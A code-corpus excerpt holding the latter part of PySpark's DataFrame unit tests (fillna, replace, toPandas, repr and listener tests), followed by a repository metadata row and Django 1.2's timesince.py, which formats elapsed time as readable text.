# fillna shouldn't change non-null values
row = self.spark.createDataFrame([(u'Alice', 10, 80.1, True)], schema).fillna(50).first()
self.assertEqual(row.age, 10)
# fillna with int
row = self.spark.createDataFrame([(u'Alice', None, None, None)], schema).fillna(50).first()
self.assertEqual(row.age, 50)
self.assertEqual(row.height, 50.0)
# fillna with double
row = self.spark.createDataFrame(
[(u'Alice', None, None, None)], schema).fillna(50.1).first()
self.assertEqual(row.age, 50)
self.assertEqual(row.height, 50.1)
# fillna with bool
row = self.spark.createDataFrame(
[(u'Alice', None, None, None)], schema).fillna(True).first()
self.assertEqual(row.age, None)
self.assertEqual(row.spy, True)
# fillna with string
row = self.spark.createDataFrame([(None, None, None, None)], schema).fillna("hello").first()
self.assertEqual(row.name, u"hello")
self.assertEqual(row.age, None)
# fillna with subset specified for numeric cols
row = self.spark.createDataFrame(
[(None, None, None, None)], schema).fillna(50, subset=['name', 'age']).first()
self.assertEqual(row.name, None)
self.assertEqual(row.age, 50)
self.assertEqual(row.height, None)
self.assertEqual(row.spy, None)
# fillna with subset specified for string cols
row = self.spark.createDataFrame(
[(None, None, None, None)], schema).fillna("haha", subset=['name', 'age']).first()
self.assertEqual(row.name, "haha")
self.assertEqual(row.age, None)
self.assertEqual(row.height, None)
self.assertEqual(row.spy, None)
# fillna with subset specified for bool cols
row = self.spark.createDataFrame(
[(None, None, None, None)], schema).fillna(True, subset=['name', 'spy']).first()
self.assertEqual(row.name, None)
self.assertEqual(row.age, None)
self.assertEqual(row.height, None)
self.assertEqual(row.spy, True)
# fillna with dictionary for boolean types
row = self.spark.createDataFrame([Row(a=None), Row(a=True)]).fillna({"a": True}).first()
self.assertEqual(row.a, True)
def test_repartitionByRange_dataframe(self):
schema = StructType([
StructField("name", StringType(), True),
StructField("age", IntegerType(), True),
StructField("height", DoubleType(), True)])
df1 = self.spark.createDataFrame(
[(u'Bob', 27, 66.0), (u'Alice', 10, 10.0), (u'Bob', 10, 66.0)], schema)
df2 = self.spark.createDataFrame(
[(u'Alice', 10, 10.0), (u'Bob', 10, 66.0), (u'Bob', 27, 66.0)], schema)
# test repartitionByRange(numPartitions, *cols)
df3 = df1.repartitionByRange(2, "name", "age")
self.assertEqual(df3.rdd.getNumPartitions(), 2)
self.assertEqual(df3.rdd.first(), df2.rdd.first())
self.assertEqual(df3.rdd.take(3), df2.rdd.take(3))
# test repartitionByRange(numPartitions, *cols)
df4 = df1.repartitionByRange(3, "name", "age")
self.assertEqual(df4.rdd.getNumPartitions(), 3)
self.assertEqual(df4.rdd.first(), df2.rdd.first())
self.assertEqual(df4.rdd.take(3), df2.rdd.take(3))
# test repartitionByRange(*cols)
df5 = df1.repartitionByRange(5, "name", "age")
self.assertEqual(df5.rdd.first(), df2.rdd.first())
self.assertEqual(df5.rdd.take(3), df2.rdd.take(3))
def test_replace(self):
schema = StructType([
StructField("name", StringType(), True),
StructField("age", IntegerType(), True),
StructField("height", DoubleType(), True)])
# replace with int
row = self.spark.createDataFrame([(u'Alice', 10, 10.0)], schema).replace(10, 20).first()
self.assertEqual(row.age, 20)
self.assertEqual(row.height, 20.0)
# replace with double
row = self.spark.createDataFrame(
[(u'Alice', 80, 80.0)], schema).replace(80.0, 82.1).first()
self.assertEqual(row.age, 82)
self.assertEqual(row.height, 82.1)
# replace with string
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace(u'Alice', u'Ann').first()
self.assertEqual(row.name, u"Ann")
self.assertEqual(row.age, 10)
# replace with subset specified by a string of a column name w/ actual change
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace(10, 20, subset='age').first()
self.assertEqual(row.age, 20)
# replace with subset specified by a string of a column name w/o actual change
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace(10, 20, subset='height').first()
self.assertEqual(row.age, 10)
# replace with subset specified with one column replaced, another column not in subset
# stays unchanged.
row = self.spark.createDataFrame(
[(u'Alice', 10, 10.0)], schema).replace(10, 20, subset=['name', 'age']).first()
self.assertEqual(row.name, u'Alice')
self.assertEqual(row.age, 20)
self.assertEqual(row.height, 10.0)
# replace with subset specified but no column will be replaced
row = self.spark.createDataFrame(
[(u'Alice', 10, None)], schema).replace(10, 20, subset=['name', 'height']).first()
self.assertEqual(row.name, u'Alice')
self.assertEqual(row.age, 10)
self.assertEqual(row.height, None)
# replace with lists
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace([u'Alice'], [u'Ann']).first()
self.assertTupleEqual(row, (u'Ann', 10, 80.1))
# replace with dict
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace({10: 11}).first()
self.assertTupleEqual(row, (u'Alice', 11, 80.1))
# test backward compatibility with dummy value
dummy_value = 1
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace({'Alice': 'Bob'}, dummy_value).first()
self.assertTupleEqual(row, (u'Bob', 10, 80.1))
# test dict with mixed numerics
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace({10: -10, 80.1: 90.5}).first()
self.assertTupleEqual(row, (u'Alice', -10, 90.5))
# replace with tuples
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace((u'Alice', ), (u'Bob', )).first()
self.assertTupleEqual(row, (u'Bob', 10, 80.1))
# replace multiple columns
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.0)], schema).replace((10, 80.0), (20, 90)).first()
self.assertTupleEqual(row, (u'Alice', 20, 90.0))
# test for mixed numerics
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.0)], schema).replace((10, 80), (20, 90.5)).first()
self.assertTupleEqual(row, (u'Alice', 20, 90.5))
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.0)], schema).replace({10: 20, 80: 90.5}).first()
self.assertTupleEqual(row, (u'Alice', 20, 90.5))
# replace with boolean
row = (self
.spark.createDataFrame([(u'Alice', 10, 80.0)], schema)
.selectExpr("name = 'Bob'", 'age <= 15')
.replace(False, True).first())
self.assertTupleEqual(row, (True, True))
# replace string with None and then drop None rows
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.0)], schema).replace(u'Alice', None).dropna()
self.assertEqual(row.count(), 0)
# replace with number and None
row = self.spark.createDataFrame(
[(u'Alice', 10, 80.0)], schema).replace([10, 80], [20, None]).first()
self.assertTupleEqual(row, (u'Alice', 20, None))
# should fail if subset is not list, tuple or None
with self.assertRaises(TypeError):
self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace({10: 11}, subset=1).first()
# should fail if to_replace and value have different length
with self.assertRaises(ValueError):
self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace(["Alice", "Bob"], ["Eve"]).first()
# should fail if when received unexpected type
with self.assertRaises(TypeError):
from datetime import datetime
self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace(datetime.now(), datetime.now()).first()
# should fail if provided mixed type replacements
with self.assertRaises(ValueError):
self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace(["Alice", 10], ["Eve", 20]).first()
with self.assertRaises(ValueError):
self.spark.createDataFrame(
[(u'Alice', 10, 80.1)], schema).replace({u"Alice": u"Bob", 10: 20}).first()
with self.assertRaisesRegex(
TypeError,
'value argument is required when to_replace is not a dictionary.'):
self.spark.createDataFrame(
[(u'Alice', 10, 80.0)], schema).replace(["Alice", "Bob"]).first()
def test_with_column_with_existing_name(self):
keys = self.df.withColumn("key", self.df.key).select("key").collect()
self.assertEqual([r.key for r in keys], list(range(100)))
# regression test for SPARK-10417
def test_column_iterator(self):
def foo():
for x in self.df.key:
break
self.assertRaises(TypeError, foo)
def test_generic_hints(self):
from pyspark.sql import DataFrame
df1 = self.spark.range(10e10).toDF("id")
df2 = self.spark.range(10e10).toDF("id")
self.assertIsInstance(df1.hint("broadcast"), DataFrame)
self.assertIsInstance(df1.hint("broadcast", []), DataFrame)
# Dummy rules
self.assertIsInstance(df1.hint("broadcast", "foo", "bar"), DataFrame)
self.assertIsInstance(df1.hint("broadcast", ["foo", "bar"]), DataFrame)
plan = df1.join(df2.hint("broadcast"), "id")._jdf.queryExecution().executedPlan()
self.assertEqual(1, plan.toString().count("BroadcastHashJoin"))
# add tests for SPARK-23647 (test more types for hint)
def test_extended_hint_types(self):
df = self.spark.range(10e10).toDF("id")
such_a_nice_list = ["itworks1", "itworks2", "itworks3"]
hinted_df = df.hint("my awesome hint", 1.2345, "what", such_a_nice_list)
logical_plan = hinted_df._jdf.queryExecution().logical()
self.assertEqual(1, logical_plan.toString().count("1.2345"))
self.assertEqual(1, logical_plan.toString().count("what"))
self.assertEqual(3, logical_plan.toString().count("itworks"))
def test_sample(self):
self.assertRaisesRegex(
TypeError,
"should be a bool, float and number",
lambda: self.spark.range(1).sample())
self.assertRaises(
TypeError,
lambda: self.spark.range(1).sample("a"))
self.assertRaises(
TypeError,
lambda: self.spark.range(1).sample(seed="abc"))
self.assertRaises(
IllegalArgumentException,
lambda: self.spark.range(1).sample(-1.0))
def test_toDF_with_schema_string(self):
data = [Row(key=i, value=str(i)) for i in range(100)]
rdd = self.sc.parallelize(data, 5)
df = rdd.toDF("key: int, value: string")
self.assertEqual(df.schema.simpleString(), "struct<key:int,value:string>")
self.assertEqual(df.collect(), data)
# different but compatible field types can be used.
df = rdd.toDF("key: string, value: string")
self.assertEqual(df.schema.simpleString(), "struct<key:string,value:string>")
self.assertEqual(df.collect(), [Row(key=str(i), value=str(i)) for i in range(100)])
# field names can differ.
df = rdd.toDF(" a: int, b: string ")
self.assertEqual(df.schema.simpleString(), "struct<a:int,b:string>")
self.assertEqual(df.collect(), data)
# number of fields must match.
self.assertRaisesRegex(Exception, "Length of object",
lambda: rdd.toDF("key: int").collect())
# field types mismatch will cause exception at runtime.
self.assertRaisesRegex(Exception, "FloatType can not accept",
lambda: rdd.toDF("key: float, value: string").collect())
# flat schema values will be wrapped into row.
df = rdd.map(lambda row: row.key).toDF("int")
self.assertEqual(df.schema.simpleString(), "struct<value:int>")
self.assertEqual(df.collect(), [Row(key=i) for i in range(100)])
# users can use DataType directly instead of data type string.
df = rdd.map(lambda row: row.key).toDF(IntegerType())
self.assertEqual(df.schema.simpleString(), "struct<value:int>")
self.assertEqual(df.collect(), [Row(key=i) for i in range(100)])
def test_join_without_on(self):
df1 = self.spark.range(1).toDF("a")
df2 = self.spark.range(1).toDF("b")
with self.sql_conf({"spark.sql.crossJoin.enabled": False}):
self.assertRaises(AnalysisException, lambda: df1.join(df2, how="inner").collect())
with self.sql_conf({"spark.sql.crossJoin.enabled": True}):
actual = df1.join(df2, how="inner").collect()
expected = [Row(a=0, b=0)]
self.assertEqual(actual, expected)
# Regression test for invalid join methods when on is None, Spark-14761
def test_invalid_join_method(self):
df1 = self.spark.createDataFrame([("Alice", 5), ("Bob", 8)], ["name", "age"])
df2 = self.spark.createDataFrame([("Alice", 80), ("Bob", 90)], ["name", "height"])
self.assertRaises(IllegalArgumentException, lambda: df1.join(df2, how="invalid-join-type"))
# Cartesian products require cross join syntax
def test_require_cross(self):
df1 = self.spark.createDataFrame([(1, "1")], ("key", "value"))
df2 = self.spark.createDataFrame([(1, "1")], ("key", "value"))
with self.sql_conf({"spark.sql.crossJoin.enabled": False}):
# joins without conditions require cross join syntax
self.assertRaises(AnalysisException, lambda: df1.join(df2).collect())
# works with crossJoin
self.assertEqual(1, df1.crossJoin(df2).count())
def test_cache(self):
spark = self.spark
with self.tempView("tab1", "tab2"):
spark.createDataFrame([(2, 2), (3, 3)]).createOrReplaceTempView("tab1")
spark.createDataFrame([(2, 2), (3, 3)]).createOrReplaceTempView("tab2")
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
spark.catalog.cacheTable("tab1")
self.assertTrue(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
spark.catalog.cacheTable("tab2")
spark.catalog.uncacheTable("tab1")
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertTrue(spark.catalog.isCached("tab2"))
spark.catalog.clearCache()
self.assertFalse(spark.catalog.isCached("tab1"))
self.assertFalse(spark.catalog.isCached("tab2"))
self.assertRaisesRegex(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.isCached("does_not_exist"))
self.assertRaisesRegex(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.cacheTable("does_not_exist"))
self.assertRaisesRegex(
AnalysisException,
"does_not_exist",
lambda: spark.catalog.uncacheTable("does_not_exist"))
def _to_pandas(self):
from datetime import datetime, date
schema = StructType().add("a", IntegerType()).add("b", StringType())\
.add("c", BooleanType()).add("d", FloatType())\
.add("dt", DateType()).add("ts", TimestampType())
data = [
(1, "foo", True, 3.0, date(1969, 1, 1), datetime(1969, 1, 1, 1, 1, 1)),
(2, "foo", True, 5.0, None, None),
(3, "bar", False, -1.0, date(2012, 3, 3), datetime(2012, 3, 3, 3, 3, 3)),
(4, "bar", False, 6.0, date(2100, 4, 4), datetime(2100, 4, 4, 4, 4, 4)),
]
df = self.spark.createDataFrame(data, schema)
return df.toPandas()
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas(self):
import numpy as np
pdf = self._to_pandas()
types = pdf.dtypes
self.assertEqual(types[0], np.int32)
self.assertEqual(types[1], np.object)
self.assertEqual(types[2], np.bool)
self.assertEqual(types[3], np.float32)
self.assertEqual(types[4], np.object) # datetime.date
self.assertEqual(types[5], 'datetime64[ns]')
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas_with_duplicated_column_names(self):
import numpy as np
sql = "select 1 v, 1 v"
for arrowEnabled in [False, True]:
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": arrowEnabled}):
df = self.spark.sql(sql)
pdf = df.toPandas()
types = pdf.dtypes
self.assertEqual(types.iloc[0], np.int32)
self.assertEqual(types.iloc[1], np.int32)
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas_on_cross_join(self):
import numpy as np
sql = """
select t1.*, t2.* from (
select explode(sequence(1, 3)) v
) t1 left join (
select explode(sequence(1, 3)) v
) t2
"""
for arrowEnabled in [False, True]:
with self.sql_conf({"spark.sql.crossJoin.enabled": True,
"spark.sql.execution.arrow.pyspark.enabled": arrowEnabled}):
df = self.spark.sql(sql)
pdf = df.toPandas()
types = pdf.dtypes
self.assertEqual(types.iloc[0], np.int32)
self.assertEqual(types.iloc[1], np.int32)
@unittest.skipIf(have_pandas, "Required Pandas was found.")
def test_to_pandas_required_pandas_not_found(self):
with QuietTest(self.sc):
with self.assertRaisesRegex(ImportError, 'Pandas >= .* must be installed'):
self._to_pandas()
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas_avoid_astype(self):
import numpy as np
schema = StructType().add("a", IntegerType()).add("b", StringType())\
.add("c", IntegerType())
data = [(1, "foo", 16777220), (None, "bar", None)]
df = self.spark.createDataFrame(data, schema)
types = df.toPandas().dtypes
self.assertEqual(types[0], np.float64) # doesn't convert to np.int32 due to NaN value.
self.assertEqual(types[1], np.object)
self.assertEqual(types[2], np.float64)
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas_from_empty_dataframe(self):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
# SPARK-29188 test that toPandas() on an empty dataframe has the correct dtypes
import numpy as np
sql = """
SELECT CAST(1 AS TINYINT) AS tinyint,
CAST(1 AS SMALLINT) AS smallint,
CAST(1 AS INT) AS int,
CAST(1 AS BIGINT) AS bigint,
CAST(0 AS FLOAT) AS float,
CAST(0 AS DOUBLE) AS double,
CAST(1 AS BOOLEAN) AS boolean,
CAST('foo' AS STRING) AS string,
CAST('2019-01-01' AS TIMESTAMP) AS timestamp
"""
dtypes_when_nonempty_df = self.spark.sql(sql).toPandas().dtypes
dtypes_when_empty_df = self.spark.sql(sql).filter("False").toPandas().dtypes
self.assertTrue(np.all(dtypes_when_empty_df == dtypes_when_nonempty_df))
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas_from_null_dataframe(self):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
# SPARK-29188 test that toPandas() on a dataframe with only nulls has correct dtypes
import numpy as np
sql = """
SELECT CAST(NULL AS TINYINT) AS tinyint,
CAST(NULL AS SMALLINT) AS smallint,
CAST(NULL AS INT) AS int,
CAST(NULL AS BIGINT) AS bigint,
CAST(NULL AS FLOAT) AS float,
CAST(NULL AS DOUBLE) AS double,
CAST(NULL AS BOOLEAN) AS boolean,
CAST(NULL AS STRING) AS string,
CAST(NULL AS TIMESTAMP) AS timestamp
"""
pdf = self.spark.sql(sql).toPandas()
types = pdf.dtypes
self.assertEqual(types[0], np.float64)
self.assertEqual(types[1], np.float64)
self.assertEqual(types[2], np.float64)
self.assertEqual(types[3], np.float64)
self.assertEqual(types[4], np.float32)
self.assertEqual(types[5], np.float64)
self.assertEqual(types[6], np.object)
self.assertEqual(types[7], np.object)
self.assertTrue(np.can_cast(np.datetime64, types[8]))
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_to_pandas_from_mixed_dataframe(self):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
# SPARK-29188 test that toPandas() on a dataframe with some nulls has correct dtypes
import numpy as np
sql = """
SELECT CAST(col1 AS TINYINT) AS tinyint,
CAST(col2 AS SMALLINT) AS smallint,
CAST(col3 AS INT) AS int,
CAST(col4 AS BIGINT) AS bigint,
CAST(col5 AS FLOAT) AS float,
CAST(col6 AS DOUBLE) AS double,
CAST(col7 AS BOOLEAN) AS boolean,
CAST(col8 AS STRING) AS string,
timestamp_seconds(col9) AS timestamp
FROM VALUES (1, 1, 1, 1, 1, 1, 1, 1, 1),
(NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)
"""
pdf_with_some_nulls = self.spark.sql(sql).toPandas()
pdf_with_only_nulls = self.spark.sql(sql).filter('tinyint is null').toPandas()
self.assertTrue(np.all(pdf_with_only_nulls.dtypes == pdf_with_some_nulls.dtypes))
def test_create_dataframe_from_array_of_long(self):
import array
data = [Row(longarray=array.array('l', [-9223372036854775808, 0, 9223372036854775807]))]
df = self.spark.createDataFrame(data)
self.assertEqual(df.first(), Row(longarray=[-9223372036854775808, 0, 9223372036854775807]))
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_create_dataframe_from_pandas_with_timestamp(self):
import pandas as pd
from datetime import datetime
pdf = pd.DataFrame({"ts": [datetime(2017, 10, 31, 1, 1, 1)],
"d": [pd.Timestamp.now().date()]}, columns=["d", "ts"])
# test types are inferred correctly without specifying schema
df = self.spark.createDataFrame(pdf)
self.assertTrue(isinstance(df.schema['ts'].dataType, TimestampType))
self.assertTrue(isinstance(df.schema['d'].dataType, DateType))
# test with schema will accept pdf as input
df = self.spark.createDataFrame(pdf, schema="d date, ts timestamp")
self.assertTrue(isinstance(df.schema['ts'].dataType, TimestampType))
self.assertTrue(isinstance(df.schema['d'].dataType, DateType))
@unittest.skipIf(have_pandas, "Required Pandas was found.")
def test_create_dataframe_required_pandas_not_found(self):
with QuietTest(self.sc):
with self.assertRaisesRegex(
ImportError,
"(Pandas >= .* must be installed|No module named '?pandas'?)"):
import pandas as pd
from datetime import datetime
pdf = pd.DataFrame({"ts": [datetime(2017, 10, 31, 1, 1, 1)],
"d": [pd.Timestamp.now().date()]})
self.spark.createDataFrame(pdf)
# Regression test for SPARK-23360
@unittest.skipIf(not have_pandas, pandas_requirement_message) # type: ignore
def test_create_dataframe_from_pandas_with_dst(self):
import pandas as pd
from pandas.testing import assert_frame_equal
from datetime import datetime
pdf = pd.DataFrame({'time': [datetime(2015, 10, 31, 22, 30)]})
df = self.spark.createDataFrame(pdf)
assert_frame_equal(pdf, df.toPandas())
orig_env_tz = os.environ.get('TZ', None)
try:
tz = 'America/Los_Angeles'
os.environ['TZ'] = tz
time.tzset()
with self.sql_conf({'spark.sql.session.timeZone': tz}):
df = self.spark.createDataFrame(pdf)
assert_frame_equal(pdf, df.toPandas())
finally:
del os.environ['TZ']
if orig_env_tz is not None:
os.environ['TZ'] = orig_env_tz
time.tzset()
def test_repr_behaviors(self):
import re
pattern = re.compile(r'^ *\|', re.MULTILINE)
df = self.spark.createDataFrame([(1, "1"), (22222, "22222")], ("key", "value"))
# test when eager evaluation is enabled and _repr_html_ will not be called
with self.sql_conf({"spark.sql.repl.eagerEval.enabled": True}):
expected1 = """+-----+-----+
|| key|value|
|+-----+-----+
|| 1| 1|
||22222|22222|
|+-----+-----+
|"""
self.assertEqual(re.sub(pattern, '', expected1), df.__repr__())
with self.sql_conf({"spark.sql.repl.eagerEval.truncate": 3}):
expected2 = """+---+-----+
||key|value|
|+---+-----+
|| 1| 1|
||222| 222|
|+---+-----+
|"""
self.assertEqual(re.sub(pattern, '', expected2), df.__repr__())
with self.sql_conf({"spark.sql.repl.eagerEval.maxNumRows": 1}):
expected3 = """+---+-----+
||key|value|
|+---+-----+
|| 1| 1|
|+---+-----+
|only showing top 1 row
|"""
self.assertEqual(re.sub(pattern, '', expected3), df.__repr__())
# test when eager evaluation is enabled and _repr_html_ will be called
with self.sql_conf({"spark.sql.repl.eagerEval.enabled": True}):
expected1 = """<table border='1'>
|<tr><th>key</th><th>value</th></tr>
|<tr><td>1</td><td>1</td></tr>
|<tr><td>22222</td><td>22222</td></tr>
|</table>
|"""
self.assertEqual(re.sub(pattern, '', expected1), df._repr_html_())
with self.sql_conf({"spark.sql.repl.eagerEval.truncate": 3}):
expected2 = """<table border='1'>
|<tr><th>key</th><th>value</th></tr>
|<tr><td>1</td><td>1</td></tr>
|<tr><td>222</td><td>222</td></tr>
|</table>
|"""
self.assertEqual(re.sub(pattern, '', expected2), df._repr_html_())
with self.sql_conf({"spark.sql.repl.eagerEval.maxNumRows": 1}):
expected3 = """<table border='1'>
|<tr><th>key</th><th>value</th></tr>
|<tr><td>1</td><td>1</td></tr>
|</table>
|only showing top 1 row
|"""
self.assertEqual(re.sub(pattern, '', expected3), df._repr_html_())
# test when eager evaluation is disabled and _repr_html_ will be called
with self.sql_conf({"spark.sql.repl.eagerEval.enabled": False}):
expected = "DataFrame[key: bigint, value: string]"
self.assertEqual(None, df._repr_html_())
self.assertEqual(expected, df.__repr__())
with self.sql_conf({"spark.sql.repl.eagerEval.truncate": 3}):
self.assertEqual(None, df._repr_html_())
self.assertEqual(expected, df.__repr__())
with self.sql_conf({"spark.sql.repl.eagerEval.maxNumRows": 1}):
self.assertEqual(None, df._repr_html_())
self.assertEqual(expected, df.__repr__())
def test_to_local_iterator(self):
df = self.spark.range(8, numPartitions=4)
expected = df.collect()
it = df.toLocalIterator()
self.assertEqual(expected, list(it))
# Test DataFrame with empty partition
df = self.spark.range(3, numPartitions=4)
it = df.toLocalIterator()
expected = df.collect()
self.assertEqual(expected, list(it))
def test_to_local_iterator_prefetch(self):
df = self.spark.range(8, numPartitions=4)
expected = df.collect()
it = df.toLocalIterator(prefetchPartitions=True)
self.assertEqual(expected, list(it))
def test_to_local_iterator_not_fully_consumed(self):
# SPARK-23961: toLocalIterator throws exception when not fully consumed
# Create a DataFrame large enough so that write to socket will eventually block
df = self.spark.range(1 << 20, numPartitions=2)
it = df.toLocalIterator()
self.assertEqual(df.take(1)[0], next(it))
with QuietTest(self.sc):
it = None # remove iterator from scope, socket is closed when cleaned up
# Make sure normal df operations still work
result = []
for i, row in enumerate(df.toLocalIterator()):
result.append(row)
if i == 7:
break
self.assertEqual(df.take(8), result)
def test_same_semantics_error(self):
with QuietTest(self.sc):
with self.assertRaisesRegex(TypeError, "should be of DataFrame.*int"):
self.spark.range(10).sameSemantics(1)
def test_input_files(self):
tpath = tempfile.mkdtemp()
shutil.rmtree(tpath)
try:
self.spark.range(1, 100, 1, 10).write.parquet(tpath)
# read parquet file and get the input files list
input_files_list = self.spark.read.parquet(tpath).inputFiles()
# input files list should contain 10 entries
self.assertEqual(len(input_files_list), 10)
# all file paths in list must contain tpath
for file_path in input_files_list:
self.assertTrue(tpath in file_path)
finally:
shutil.rmtree(tpath)
def test_df_show(self):
# SPARK-35408: ensure better diagnostics if incorrect parameters are passed
# to DataFrame.show
df = self.spark.createDataFrame([('foo',)])
df.show(5)
df.show(5, True)
df.show(5, 1, True)
df.show(n=5, truncate='1', vertical=False)
df.show(n=5, truncate=1.5, vertical=False)
with self.assertRaisesRegex(TypeError, "Parameter 'n'"):
df.show(True)
with self.assertRaisesRegex(TypeError, "Parameter 'vertical'"):
df.show(vertical='foo')
with self.assertRaisesRegex(TypeError, "Parameter 'truncate=foo'"):
df.show(truncate='foo')
@unittest.skipIf(
not have_pandas or not have_pyarrow,
pandas_requirement_message or pyarrow_requirement_message) # type: ignore
def test_to_pandas_on_spark(self):
import pandas as pd
from pandas.testing import assert_frame_equal
sdf = self.spark.createDataFrame([("a", 1), ("b", 2), ("c", 3)], ["Col1", "Col2"])
psdf_from_sdf = sdf.to_pandas_on_spark()
psdf_from_sdf_with_index = sdf.to_pandas_on_spark(index_col="Col1")
pdf = pd.DataFrame({"Col1": ["a", "b", "c"], "Col2": [1, 2, 3]})
pdf_with_index = pdf.set_index("Col1")
assert_frame_equal(pdf, psdf_from_sdf.to_pandas())
assert_frame_equal(pdf_with_index, psdf_from_sdf_with_index.to_pandas())
class QueryExecutionListenerTests(unittest.TestCase, SQLTestUtils):
# These tests are separate because it uses 'spark.sql.queryExecutionListeners' which is
# static and immutable. This can't be set or unset, for example, via `spark.conf`.
@classmethod
def setUpClass(cls):
import glob
from pyspark.find_spark_home import _find_spark_home
SPARK_HOME = _find_spark_home()
filename_pattern = (
"sql/core/target/scala-*/test-classes/org/apache/spark/sql/"
"TestQueryExecutionListener.class")
cls.has_listener = bool(glob.glob(os.path.join(SPARK_HOME, filename_pattern)))
if cls.has_listener:
# Note that 'spark.sql.queryExecutionListeners' is a static immutable configuration.
cls.spark = SparkSession.builder \
.master("local[4]") \
.appName(cls.__name__) \
.config(
"spark.sql.queryExecutionListeners",
"org.apache.spark.sql.TestQueryExecutionListener") \
.getOrCreate()
def setUp(self):
if not self.has_listener:
raise self.skipTest(
"'org.apache.spark.sql.TestQueryExecutionListener' is not "
"available. Will skip the related tests.")
@classmethod
def tearDownClass(cls):
if hasattr(cls, "spark"):
cls.spark.stop()
def tearDown(self):
self.spark._jvm.OnSuccessCall.clear()
def test_query_execution_listener_on_collect(self):
self.assertFalse(
self.spark._jvm.OnSuccessCall.isCalled(),
"The callback from the query execution listener should not be called before 'collect'")
self.spark.sql("SELECT * FROM range(1)").collect()
self.spark.sparkContext._jsc.sc().listenerBus().waitUntilEmpty(10000)
self.assertTrue(
self.spark._jvm.OnSuccessCall.isCalled(),
"The callback from the query execution listener should be called after 'collect'")
@unittest.skipIf(
not have_pandas or not have_pyarrow,
pandas_requirement_message or pyarrow_requirement_message) # type: ignore
def test_query_execution_listener_on_collect_with_arrow(self):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": True}):
self.assertFalse(
self.spark._jvm.OnSuccessCall.isCalled(),
"The callback from the query execution listener should not be "
"called before 'toPandas'")
self.spark.sql("SELECT * FROM range(1)").toPandas()
self.spark.sparkContext._jsc.sc().listenerBus().waitUntilEmpty(10000)
self.assertTrue(
self.spark._jvm.OnSuccessCall.isCalled(),
"The callback from the query execution listener should be called after 'toPandas'")
if __name__ == "__main__":
from pyspark.sql.tests.test_dataframe import * # noqa: F401
try:
import xmlrunner # type: ignore
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| apache-2.0 |
ProfessionalIT/professionalit-webiste | sdk/google_appengine/lib/django-1.2/django/utils/timesince.py | 319 | 2698 | import datetime
import time
from django.utils.tzinfo import LocalTimezone
from django.utils.translation import ungettext, ugettext
def timesince(d, now=None):
"""
Takes two datetime objects and returns the time between d and now
as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
then "0 minutes" is returned.
Units used are years, months, weeks, days, hours, and minutes.
Seconds and microseconds are ignored. Up to two adjacent units will be
displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.
Adapted from http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
"""
chunks = (
(60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),
(60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),
(60 * 60 * 24 * 7, lambda n : ungettext('week', 'weeks', n)),
(60 * 60 * 24, lambda n : ungettext('day', 'days', n)),
(60 * 60, lambda n: ungettext('hour', 'hours', n)),
(60, lambda n: ungettext('minute', 'minutes', n))
)
# Convert datetime.date to datetime.datetime for comparison.
if not isinstance(d, datetime.datetime):
d = datetime.datetime(d.year, d.month, d.day)
if now and not isinstance(now, datetime.datetime):
now = datetime.datetime(now.year, now.month, now.day)
if not now:
if d.tzinfo:
now = datetime.datetime.now(LocalTimezone(d))
else:
now = datetime.datetime.now()
# ignore microsecond part of 'd' since we removed it from 'now'
delta = now - (d - datetime.timedelta(0, 0, d.microsecond))
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return u'0 ' + ugettext('minutes')
for i, (seconds, name) in enumerate(chunks):
count = since // seconds
if count != 0:
break
s = ugettext('%(number)d %(type)s') % {'number': count, 'type': name(count)}
if i + 1 < len(chunks):
# Now get the second item
seconds2, name2 = chunks[i + 1]
count2 = (since - (seconds * count)) // seconds2
if count2 != 0:
s += ugettext(', %(number)d %(type)s') % {'number': count2, 'type': name2(count2)}
return s
